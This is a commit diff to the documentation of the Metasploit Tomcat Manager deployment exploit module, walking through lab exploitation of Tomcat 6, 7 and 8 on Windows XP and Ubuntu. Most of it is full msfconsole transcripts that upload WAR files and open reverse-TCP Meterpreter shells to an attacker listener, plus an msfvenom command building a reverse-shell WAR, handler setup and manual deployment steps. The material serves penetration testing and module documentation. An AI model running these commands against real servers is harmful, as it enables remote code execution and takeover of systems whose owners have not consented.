adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

more to edit

Browse Source
This commit is contained in:
h00die
2017-01-14 19:17:37 -05:00
parent 1615df92ef
commit bed08db43c
1 changed files with 331 additions and 168 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+331 -168
View File
@@ -2,6 +2,9 @@
This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
# Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually.
## Windows (xp sp2)
### Tomcat 6 (6.0.48)
#### Setup
@@ -9,10 +12,57 @@ This documentation is broken down by OS, Tomcat version, then privilege to show
1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
The install was default, other than adding a user during install. No other options were changed.
The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
For this exploitation, it was changed to simply `manager`
#### text/script interface
#### text/script Interface
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
```
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
```
2. Restart Tomcat service
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > set rport 8086
rport => 8086
msf exploit(tomcat_mgr_deploy) > set path /manager
path => /manager
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6071 bytes as scEYoK0.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
[*] Undeploying scEYoK0 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
### Tomcat 7 (7.0.73)
#### Setup
@@ -23,7 +73,57 @@ The install was default, other than adding a user during install. No other opti
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script interface
#### text/script Interface
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
2. Restart the service
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set payload java/
set payload java/meterpreter/bind_tcp set payload java/meterpreter/reverse_tcp set payload java/shell_reverse_tcp
set payload java/meterpreter/reverse_http set payload java/shell/bind_tcp
set payload java/meterpreter/reverse_https set payload java/shell/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
### Tomcat 8 (8.0.39)
#### Setup
@@ -37,156 +137,166 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
#### text/script interface
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following:
```
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
```
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:
2. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
2. Restart the service
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Linux
### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
#### Setup
```
sudo apt-get install tomcat6 tomcat6-admin
```
1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
#### Exploit
1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following:
```
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
```
```
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
```
2. Restart Tomcat: `sudo service tomcat6 restart`
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
rport => 8080
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
Meterpreter : x86/linux
```
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
rport => 8080
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
Meterpreter : x86/linux
```
### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
#### Setup
1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin`
1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`
#### text/script interface
1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
2. Restart Tomcat: `sudo service tomcat7 restart`
1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
` as opposed to `403 Access Denied`
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
[*] Undeploying 9QymzSGGU0H4e ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
[*] Undeploying 9QymzSGGU0H4e ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
Meterpreter : x86/linux
```
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
Meterpreter : x86/linux
```
#### gui interface
Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful.
@@ -197,51 +307,104 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
#### text/script interface
1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
2. Restart tomcat: `sudo service tomcat8 restart`
1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
` as opposed to `403 Access Denied`
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)
Architecture : x64
Meterpreter : x86/linux
```
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)
Architecture : x64
Meterpreter : x86/linux
```
#### gui interface
Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful.
# Manual Exploitation
## Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
Tomcat 6.0.48: manager
Tomcat 7.0.73: manager-gui
Tomcat 8.0.39: manager-gui
```
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
```
## Setup Handler
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
```
## Deploy
1. With a web browser, browse to `http://<ip>:<port>/manager/html`
2. Enter credentials (no default)
3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
## Callback
After browsing to that page, code execution will happen, and your callback will hit.
```
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Cleanup
This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.